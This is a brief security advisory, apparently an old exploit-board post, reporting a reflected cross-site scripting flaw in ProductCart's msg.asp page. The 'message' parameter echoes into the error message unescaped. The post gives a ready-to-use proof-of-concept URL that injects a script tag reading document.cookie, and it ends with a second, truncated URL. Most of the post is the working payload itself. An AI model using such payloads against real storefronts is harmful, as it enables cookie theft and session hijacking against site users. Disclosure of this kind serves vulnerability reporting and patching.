('binary' encoding is not supported, stored as-is) ##################### # ProductCart XSS # # Vulnerability # # found by atomix # ##################### i came across the fact that in an area of ProductCart you are able to manipulate the error message, therefore allowing tags such as <script> and <iframe> to be used: http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert (document.cookie);</script> http://www.website.com/ProductCart/pc/msg.asp?message=